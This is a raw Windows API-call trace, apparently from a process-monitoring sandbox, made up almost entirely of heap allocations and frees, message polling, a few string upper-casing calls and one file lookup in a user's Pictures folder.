[0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.058] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0210.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.060] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.063] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/FS3WVwrvnLekT9.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906bfc10, ftCreationTime.dwHighDateTime=0x1d5d32e, ftLastAccessTime.dwLowDateTime=0xc047fd0, ftLastAccessTime.dwHighDateTime=0x1d5cb3e, ftLastWriteTime.dwLowDateTime=0xc047fd0, ftLastWriteTime.dwHighDateTime=0x1d5cb3e, nFileSizeHigh=0x0, nFileSizeLow=0xfb7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="FS3WVwrvnLekT9.jpg", cAlternateFileName="FS3WVW~1.JPG")) returned 0x9e2078 [0210.063] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.065] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.065] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.065] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.066] HeapFree (in: hHeap=0x2af0000, 